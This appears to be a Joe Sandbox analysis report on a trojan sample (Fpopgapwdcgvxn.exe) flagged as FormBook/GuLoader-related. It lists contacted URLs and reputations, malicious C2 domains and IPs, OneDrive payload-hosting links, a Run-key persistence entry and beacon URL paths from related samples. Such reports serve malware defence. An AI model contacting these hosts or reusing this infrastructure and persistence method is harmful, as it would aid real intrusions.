                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://naopta.bn.files.1drv.com/y4mkyT3e9ftNlbXtjIFcL8z3YMEEbeJfXibBwh-99Rm7Ot1eMTdDYyDRGAjFrO7mgVvFpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000886000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://transip.nl/explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpfalse
                                    high
                                    https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      http://www.sprockettrucking.com/ao65/www.leathfortexas.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        https://onedrive.live.com/Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000869000.00000004.00000020.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000866000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.000000000095E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.thnkotb.comReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://live.com/Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.ouxodb001.cfdReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wns.windows.com/eexplorer.exe, 00000005.00000000.2336924818.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2979054042.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              http://www.1techtrendzstore.com/ao65/www.kuis-raja-borong.websiteexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.hivaom.top/ao65/www.canwealljustagree.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: phishing
                                              unknown
                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://www.ouxodb001.cfd/ao65/www.optimusvisionlb.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.maltsky.netReferer:explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.1techtrendzstore.com/ao65/explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • 2%, Virustotal, Browse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.optimusvisionlb.com/ao65/www.maltsky.netexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.leathfortexas.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • 3%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://naopta.bn.files.1drv.com/y4mUDOC-1KaMFlmbquo_MCuV35VY0DNhAx1uT2j8j4iW_6OvPBYM_BkkkKs9VVlfZP7Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.stellarskyline.com/ao65/www.hivaom.topexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000005.00000000.2345200413.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4629484500.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          https://outlook.comeexplorer.exe, 00000005.00000002.4629484500.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2980040926.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2345200413.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000005.00000000.2336924818.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2979054042.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.oaistetic.comexplorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
Name: http://www.leathfortexas.com/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• 6%, Virustotal
• Avira URL Cloud: malware
Reputation: unknown

Name: http://www.sprockettrucking.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• 1%, Virustotal
• Avira URL Cloud: safe
Reputation: unknown

Name: https://naopta.bn.files.1drv.com/y4mu7B-5fk8szYFW7t5U8GAGFWHz18vQ3lOohdWuW1sD9KC1dexn3z8c44A7Y_qMtHF
Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000812000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.kermisbedrijfkramer.online/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• 4%, Virustotal
• Avira URL Cloud: malware
Reputation: unknown

Name: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.pmail.com
Source: Fpopgapwdcgvxn.exe, 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2322773738.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000002.2582481668.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2688350100.00000000029C0000.00000004.00001000.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://naopta.bn.files.1drv.com:443/y4mUDOC-1KaMFlmbquo_MCuV35VY0DNhAx1uT2j8j4iW_6OvPBYM_BkkkKs9VVl
Source: Telragab.PIF, 0000000B.00000002.2686612744.00000000009AF000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.hivaom.top/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• 2%, Virustotal
• Avira URL Cloud: phishing
Reputation: unknown

Name: http://www.kuis-raja-borong.website/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: malware
Reputation: unknown

Name: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.ecofare.xyzReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation: unknown

Name: http://www.sprockettrucking.comReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation: unknown

Name: https://naopta.bn.files.1drv.com/y4mb0GM36UMcQfEUiMpLP03Y8bvo9LtwS-BqKbXqgBYhMdWptkR9dr4YpWcIo8Dgkas
Source: Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://api.msn.com/I
Source: explorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://naopta.bn.files.1drv.com/
Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000886000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.kuis-raja-borong.website/ao65/www.oaistetic.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: malware
Reputation: unknown

Name: http://www.ouxodb001.cfd
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• 1%, Virustotal
• Avira URL Cloud: safe
Reputation: unknown

Name: http://www.sprockettrucking.com/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: malware
Reputation: unknown

Name: https://onedrive.live.com/download?resid=D2FF5C6240820574%21465&authkey=
Source: Telragab.PIF, 0000000B.00000002.2688655343.0000000002B85000.00000004.00001000.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.kuis-raja-borong.websiteReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation: unknown

Name: https://www.transip.nl/services/search-domains/
Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://schemas.micro
Source: explorer.exe, 00000005.00000000.2331503846.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2331530357.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2324920937.00000000028A0000.00000002.00000001.00040000.00000000.sdmp
Malicious: false
Antivirus Detection:
• URL Reputation: safe
Reputation: unknown

Name: http://www.canwealljustagree.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: malware
Reputation: unknown

Name: http://www.maltsky.net/ao65/www.thnkotb.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: malware
Reputation: unknown

Name: http://www.harmonicod.comReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation: unknown

Name: http://www.ecofare.xyz
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation: unknown

Name: https://naopta.bn.files.1drv.com:443/y4mbKR8EFV2GjaLZUNxo34xSffY_nOEJNB-_msmauZ_D4C9ZlBli6oXkwvRloeD
Source: Telragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.optimusvisionlb.comReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation: unknown

Name: http://www.ecofare.xyz/ao65/www.iokgw1.top
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: phishing
Reputation: unknown

Name: http://www.kuis-raja-borong.website
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation: unknown

Name: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.oaistetic.com/ao65/
Source: explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: malware
Reputation: unknown

Name: http://www.stellarskyline.com/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: malware
Reputation: unknown

Name: https://transip.nl/cp/
Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://live.com/?
Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000872000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.optimusvisionlb.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation: unknown

Name: http://www.leathfortexas.comReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation: unknown

Name: https://live.com/(
Source: Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000797000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.canwealljustagree.com/ao65/www.ecofare.xyz
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: malware
Reputation: unknown

Name: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.stellarskyline.comReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation: unknown

Name: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.leathfortexas.com/ao65/www.ouxodb001.cfd
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: malware
Reputation: unknown

Name: http://www.maltsky.net/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: malware
Reputation: unknown

Name: https://naopta.bn.files.1drv.com/y4mWheWVd_ulVA7I3cjlifsQ_hjAjUwAiOhs_rGTjyEnBf6dISBKjP9LuUpM-ahNhLD
Source: Telragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.thnkotb.com/ao65/www.harmonicod.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: malware
Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
37.97.254.27 | kermisbedrijfkramer.online | Netherlands | 20857 | TRANSIP-ASAmsterdamtheNetherlandsNL | true
104.247.81.50 | www.harmonicod.com | Canada | 206834 | TEAMINTERNET-CA-ASCA | true
62.72.50.88 | stellarskyline.com | Germany | 5427 | PRTL-DE | true
34.93.103.39 | optimus-vision.odoo.com | United States | 15169 | GOOGLEUS | false
3.33.130.190 | leathfortexas.com | United States | 8987 | AMAZONEXPANSIONGB | true
156.237.159.158 | www.hivaom.top | Seychelles | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true
104.140.89.24 | www.maltsky.net | United States | 62904 | EONIX-COMMUNICATIONS-ASBLOCK-62904US | true
Joe Sandbox Version: 38.0.0 Ammolite
Analysis ID: 1350545
Start date and time: 2023-11-30 14:55:10 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: Fpopgapwdcgvxn.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@294/7@13/7
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 98%
                                                                                                  • Number of executed functions: 80
                                                                                                  • Number of non-executed functions: 331
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12, 20.42.65.92
                                                                                                  • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, client.wns.windows.com, bn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-bn-files-brs.onedrive.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, odc-bn-files-geo.onedrive.akadns.net, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com
                                                                                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
14:56:10 | API Interceptor | 1x Sleep call for process: Fpopgapwdcgvxn.exe modified
14:56:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Telragab C:\Users\Public\Telragab.url
14:56:23 | API Interceptor | 6959065x Sleep call for process: explorer.exe modified
14:56:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Telragab C:\Users\Public\Telragab.url
14:56:39 | API Interceptor | 2x Sleep call for process: Telragab.PIF modified
14:56:57 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
14:57:06 | API Interceptor | 7415516x Sleep call for process: rundll32.exe modified
Match        | Associated Sample Name / URL             | Detection | Threat Name           | Context
37.97.254.27 | Product_Specs.exe                        | malicious | FormBook, GuLoader    | www.wrautomotive.online/ur4g/?vxM0=G80Xg2gxjV&eh=GM1abjaFQeRWF1TbL/6IPq6IQ8Zq6L6A/eGtDh+rzhSfkUEKySbsXXOahwAFIXwkymySVlBBxGC7SDgkYy5RlvrvRaU4SsaPnA==
             | PO_VCFGA1010.exe                         | malicious | FormBook              | www.wrautomotive.online/ahec/?TrRXYB=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+z0orNAnxbm6AOaCZvJNva1SPD&NRpHp=DLPh_Z
             | 25-23PJSM-653.exe                        | malicious | FormBook, GuLoader    | www.rocsys.net/uaaq/?Zvo88=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA==&5j=JXHP5xY8
             | PAGAMENTO_INV-85732.exe                  | malicious | FormBook, NSISDropper | www.qa-manny.com/cvps/?ojQxW=_LZhZtRhEB2XP&-Lkxp=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==
             | file.exe                                 | malicious | FormBook              | www.wrautomotive.online/fdo5/?7F=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&zf7=WxIPUXb0
